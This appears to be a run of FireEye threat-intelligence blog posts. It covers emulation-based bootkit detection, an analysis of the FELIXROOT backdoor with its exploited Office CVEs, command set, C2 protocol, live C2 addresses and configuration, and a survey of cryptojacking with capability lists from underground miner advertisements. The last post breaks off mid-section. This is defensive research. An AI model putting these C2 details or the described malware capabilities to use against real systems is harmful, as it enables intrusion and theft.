Check out the Flare-On website for a live countdown timer and to see the previous year’s winners. For official news and support we will be using the Twitter hashtag: #flareon5.

BIOS Boots What? Finding Evil in Boot Code at Scale!

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is an average of 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

Enterprise Size (# hosts)

Avg # Unique Boot Records (md5)

100-1000

428

1000-10000

4,738

10000+

8,717

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes at the following two offsets to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

  • A reliable collection of boot records from systems
  • A behavioral analysis of boot records, not just static analysis
  • The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).


Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reduce the time needed on follow-up analysis by a human analyst. An interesting quality of the boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g. strings or offsets) is often very different. This makes it quite difficult to generate a hash to identify duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing the assembly instruction as it executes to ultimately arrive at the “execution hash”


Figure 2: Execution hash

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost. Unlike static analysis or hashing, it is orders of magnitude slower. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.


Figure 3: Boot record analysis workflow

Our design currently utilizes:

  • API Gateway to provide a RESTful interface.
  • Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
  • DynamoDB to track progress of processed boot records through the system.
  • S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

  1. Endpoint agents in customer networks automatically collect boot records using FireEye’s custom developed Raw Read kernel driver (see “Collect the bytes” described earlier) and return the records to FireEye’s Incident Response (IR) server.
  2. The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
  3. The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

For this problem, we leverage our in-house big data platform engine that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into the engine X15, our analysts can hunt through the results at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads or writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.

Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign

Campaign Details

In September 2017, FireEye identified the FELIXROOT backdoor as a payload in a campaign targeting Ukrainians and reported it to our intelligence customers. The campaign involved malicious Ukrainian bank documents, which contained a macro that downloaded a FELIXROOT payload, being distributed to targets.

FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine. Figure 1 shows the attack overview.


Figure 1: Attack overview

The malware is distributed via Russian-language documents (Figure 2) that are weaponized with known Microsoft Office vulnerabilities. In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware. The malicious document used is named “Seminar.rtf”. It exploits CVE-2017-0199 to download the second stage payload from 193.23.181.151 (Figure 3). The downloaded file is weaponized with CVE-2017-11882.


Figure 2: Lure documents


Figure 3: Hex dump of embedded URL in Seminar.rtf

Figure 4 shows the first payload trying to download the second stage Seminar.rtf.


Figure 4: Downloading second stage Seminar.rtf

The downloaded Seminar.rtf contains an embedded binary file that is dropped in %temp% via Equation Editor executable. This file drops the executable at %temp% (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9), which is used to drop and execute the FELIXROOT dropper component (MD5: 92F63B1227A6B37335495F9BCB939EA2).

The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section. When it is executed, it creates two files: an LNK file that points to %system32%\rundll32.exe, and the FELIXROOT loader component. The LNK file is moved to the startup directory. Figure 5 shows the command in the LNK file to execute the loader component of FELIXROOT.


Figure 5: Command in LNK file

The embedded backdoor component is encrypted using custom encryption. The file is decrypted and loaded directly in memory without touching the disk.

Technical Details

After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function.

Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key. Decryption logic used for ASCII strings is shown in Figure 6.


Figure 6: ASCII decryption routine

Decryption logic used for Unicode strings is shown in Figure 7.


Figure 7: Unicode decryption routine

Upon execution, a new thread is created where the backdoor sleeps for 10 minutes. Then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If the malware was launched by RUNDLL32.exe with parameter #1, then it proceeds with initial system triage before doing command and control (C2) network communications. Initial triage begins with connecting to Windows Management Instrumentation (WMI) via the “ROOT\CIMV2” namespace.

Figure 8 shows the full operation.


Figure 8: Initial execution process of backdoor component

Table 1 shows the classes referred from the “ROOT\CIMV2” and “Root\SecurityCenter2” namespace.

WMI Namespaces

Win32_OperatingSystem

Win32_ComputerSystem

AntiSpywareProduct

AntiVirusProduct

FirewallProduct

Win32_UserAccount

Win32_NetworkAdapter

Win32_Process

Table 1: Referred classes

WMI Queries and Registry Keys Used

  1. SELECT Caption FROM Win32_TimeZone
  2. SELECT CSNAME, Caption, CSDVersion, Locale, RegisteredUser FROM Win32_OperatingSystem
  3. SELECT Manufacturer, Model, SystemType, DomainRole, Domain, UserName FROM Win32_ComputerSystem

Registry entries are read for potential administration escalation and proxy information.

  1. Registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ” is queried to check the values ConsentPromptBehaviorAdmin and PromptOnSecureDesktop.
  2. Registry key “Software\Microsoft\Windows\CurrentVersion\Internet Settings\” is queried to gather proxy information with values ProxyEnable, Proxy: (NO), Proxy, ProxyServer.

Table 2 shows FELIXROOT backdoor capabilities. Each command is performed in an individual thread.

Command

Description

0x31

Fingerprint System via WMI and Registry

0x32

Drop File and execute

0x33

Remote Shell

0x34

Terminate connection with C2

0x35

Download and run batch script

0x36

Download file on machine

0x37

Upload File

Table 2: FELIXROOT backdoor commands

Figure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed.


Figure 9: Command logs after execution

Network Communications

FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server (Figure 10).


Figure 10: POST request to C2 server

All other fields, such as User-Agents, Content-Type, and Accept-Encoding, that are part of the request / response header are XOR encrypted and present in the malware. The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, processor architecture and two additional values, which are “1.3” and “KdfrJKN”. The value “KdfrJKN” may be used as identification for the campaign and is found in the JOSN object in the file (Figure 11).


Figure 11: Host information used in every communication

The FELIXROOT backdoor has three parameters for C2 communication. Each parameter provides information about the task performed on the target machine (Table 3).

Parameter

Description

‘u=’

This parameter contains target machine information in the following format:

<Computer Name>, <User Name>, <Windows Versions>, <Processor Architecture>, <1.3>, < KdfrJKN >, <Volume Serial Number>

‘&h=’

This parameter includes the information about the command executed and its results.

‘&p=’

This parameter contains the information about data associated with the C2 server.

Table 3: FELIXROOT backdoor parameters

Cryptography

All data is transferred to C2 servers using AES encryption and the IbindCtx COM interface using HTTP or HTTPS protocol. The AES key is unique for each communication and is encrypted with one of two RSA public keys. Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters.


Figure 12: RSA public key 1


Figure 13: RSA public key 2


Figure 14: AES encryption parameters

After encryption, the cipher text to be sent over C2 is Base64 encoded. Figure 15 shows the structure used to send data to the server, and Figure 16 shows the structural representation of data used in C2 communications.


Figure 15: Structure used to send data to server


Figure 16: Structure used to send data to C2 server

The structure is converted to Base64 using the CryptBinaryToStringA function.

FELIXROOT backdoor contains several commands for specific tasks. After execution of every task, the malware sleeps for one minute before executing the next task. Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine:

  1. Deletes the LNK file from the startup directory.
  2. Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
  3. Deletes the dropper components from the system.

Conclusion

CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected. At this time of writing, FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. We also advise that all industries remain on alert, as the threat actors involved in this campaign may eventually broaden the scope of their current targeting.

Appendix

Indicators of Compromise

11227ECA89CC053FB189FAC3EBF27497

Seminar.rtf

4DE5ADB865B5198B4F2593AD436FCEFF

Seminar.rtf

78734CD268E5C9AB4184E1BBE21A6EB9

Zam<RandomNumber>.doc

92F63B1227A6B37335495F9BCB939EA2

FELIXROOT Dropper

DE10A32129650849CEAF4009E660F72F

FELIXROOT Backdoor

Table 4: FELIXROOT IOCs

Network Indicators of Compromise

217.12.204.100/news

217.12.204.100:443/news

193.23.181.151/Seminar.rtf

Accept-Encoding: gzip, deflate

content-Type: application/x-www-form-urlencoded

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Configuration Files

Version 1:

{"1" : "https://88.198.13.116:8443/xmlservice","2" : "30","4" : "GufseGHbc","6" : "3", "7" :

“http://88.198.13.116:8080/xmlservice"}

Version 2:

{"1" : "https://217.12.204.100/news/","2" : "30","4" : "KdfrJKN","6" : "3", "7" :

"http://217.12.204.100/news/"}

FireEye Detections

MD5

Product

Signature

Action

11227ECA89CC053FB189FAC3EBF27497

NX/EX/AX

Malware.Binary.rtf

Block

4DE5ADB865B5198B4F2593AD436FCEFF

NX/EX/AX

Malware.Binary.rtf

Block

78734CD268E5C9AB4184E1BBE21A6EB9

NX/EX/AX

Malware.Binary

Block

92F63B1227A6B37335495F9BCB939EA2

NX/EX/AX

FE_Dropper_Win32_FELIXROOT_1

Block

DE10A32129650849CEAF4009E660F72F

NX/EX/AX

FE_Backdoor_Win32_FELIXROOT_2

Block

11227ECA89CC053FB189FAC3EBF27497

HX

IOC

Alert

4DE5ADB865B5198B4F2593AD436FCEFF

HX

IOC

Alert

Table 5: FireEye Detections

Acknowledgements

Special thanks to Jonell Baltazar, Alex Berry and Benjamin Read for their contributions to this blog.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Introduction

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.


Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.


Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities

XMR-STACK

MINERGATE

XMRMINER

CCMINER

XMRIG

CLAYMORE

SGMINER

CAST XMR

LUKMINER

CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
  • Windows Task Manager
  • Process Killer
  • KillProcess
  • System Explorer
  • Process Explorer
  • AnVir
  • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.

The electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems
Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.
Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

